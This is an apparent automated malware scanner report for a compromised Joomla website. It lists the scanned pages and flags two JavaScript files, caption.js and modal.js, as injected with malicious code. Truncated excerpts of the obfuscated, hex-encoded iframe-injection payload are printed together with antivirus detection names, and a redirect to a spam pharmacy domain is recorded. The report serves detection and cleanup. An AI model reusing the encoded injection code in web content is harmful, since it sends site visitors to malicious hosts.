Malware Scanner report for td-pvsn.com

Malicious/Suspicious/Total urls checked: 2/0/16

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "td-pvsn.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=td-pvsn.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://td-pvsn.com/	200 OK Content-Length: 15034 Content-Type: text/html	clean
http://td-pvsn.com/media/system/js/caption.js	200 OK Content-Length: 13222 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = ... 3199 bytes are skipped ...2%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%31%33%65%61%5B%31%5D%5D%28%5F%30%78%31%33%65%61%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E')); Antivirus reports: AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Agent.JAB Ikarus JS.Trojan.JS.Iframe Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Agent.JAB K7AntiVirus Trojan ( 91ee82b70 ) TrendMicro-HouseCall TROJ_GEN.F47V1029 Comodo TrojWare.JS.Agent.TC Emsisoft Trojan.JS.Agent.JAB (B) K7GW Exploit ( 04c553061 ) DrWeb JS.Redirector.188 Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.JS.Agent.JAB Fortinet JS/Redirector.NJG NANO-Antivirus Trojan.Script.Redirector.bqiube F-Prot JS/Redir.SA AVG HTML/Framer Norman ShellCode.V GData Trojan.JS.Agent.JAB Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Agent.JAB
http://td-pvsn.com/index.php/works	200 OK Content-Length: 10815 Content-Type: text/html	clean
http://td-pvsn.com/index.php/services/services	200 OK Content-Length: 18581 Content-Type: text/html	clean
http://td-pvsn.com/index.php/reviews	200 OK Content-Length: 20339 Content-Type: text/html	clean
http://td-pvsn.com/media/system/js/modal.js	200 OK Content-Length: 21847 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var SqueezeBox = { presets: { size: {x: 600, y: 450}, sizeLoading: {x: 200, y: 150}, marginInner: {x: 20, y: 20}, marginImage: {x: 150, y: 200}, handler: false, adopt: null, closeWithOverlay: true, zIndex: 65555, overlayOpacity: 0.7, classWindow: '', classOverlay: '', disableFx: false, onOpen: Class.empty, onClose: Class.empty, onUpdate: Class.empty, onResize: Class.empty, onMove: Class.emp ... 3366 bytes are skipped ...2%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%31%33%65%61%5B%31%5D%5D%28%5F%30%78%31%33%65%61%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E')); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Agent.CB.5 Avast JS:Redirector-AKA [Trj] Ad-Aware Trojan.JS.Redirector.BOO Ikarus Trojan.JS.Redirector Rising JS:Malware.JCrypto!1.9BF9 nProtect Trojan.JS.Redirector.BOO K7AntiVirus Trojan ( 91ee82b70 ) TrendMicro-HouseCall TROJ_GEN.F47V0122 Comodo TrojWare.JS.Agent.TC Emsisoft Trojan.JS.Redirector.BOO (B) K7GW Exploit ( 04c553061 ) DrWeb JS.Redirector.188 Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.JS.Redirector.BOO NANO-Antivirus Trojan.Script.Redirector.bqiube F-Secure Trojan.JS.Redirector.BOO F-Prot JS/Redir.SA AVG HTML/Framer Sophos Troj/JSRedir-LX GData Trojan.JS.Redirector.BOO Commtouch JS/Redir.SA ESET-NOD32 JS/Redirector.NJG BitDefender Trojan.JS.Redirector.BOO
http://td-pvsn.com/components/com_phocagallery/assets/js/highslide/highslide-full.js	200 OK Content-Length: 109244 Content-Type: application/javascript	clean
http://td-pvsn.com/index.php/request	200 OK Content-Length: 17630 Content-Type: text/html	clean
http://td-pvsn.com/includes/js/joomla.javascript.js	200 OK Content-Length: 26664 Content-Type: application/javascript	clean
http://td-pvsn.com/index.php/contacts	200 OK Content-Length: 14688 Content-Type: text/html	clean
http://api-maps.yandex.ru/1.1/index.xml?key=APQox00BAAAAfQDwfgIAbwGogrdDOk5c-iVOlIiCOXqNzyoAAAAAAAAAAAB0SfTYBZ7yMnEeRWuNLKTevx4Y0g==	200 OK Content-Length: 5487 Content-Type: text/javascript	clean
http://td-pvsn.com/index.php/contacts?tmpl=component&print=1&page=	200 OK Content-Length: 9789 Content-Type: text/html	clean
http://td-pvsn.com/index.php/	200 OK Content-Length: 15046 Content-Type: text/html	clean
http://td-pvsn.com/index.php?view=article&catid=1:articles&id=53:2011-05-06-01-20-10&tmpl=component&print=1&layout=default&page=	200 OK Content-Length: 10065 Content-Type: text/html	clean
http://td-pvsn.com/test404page.js	HTTP/1.1 302 Found Connection: close Date: Tue, 24 Feb 2015 14:11:23 GMT Location: http://onlinedrugvalue.eu/ Server: Jino.ru/mod_pizza Content-Length: 210 Content-Type: text/html	clean
http://onlinedrugvalue.eu/	500 timeout Content-Length: 30 Content-Type: text/plain	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: td-pvsn.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Feb 2015 14:11:17 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 24 Feb 2015 14:11:17 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: aecad04d8ec5aecaefbb8a89f8fc816b=b0a4fca07a369bc1cbc72b636512d076; path=/

Second query (visit from search engine):
GET / HTTP/1.1
Host: td-pvsn.com
Referer: http://www.google.com/search?q=td-pvsn.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for td-pvsn.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools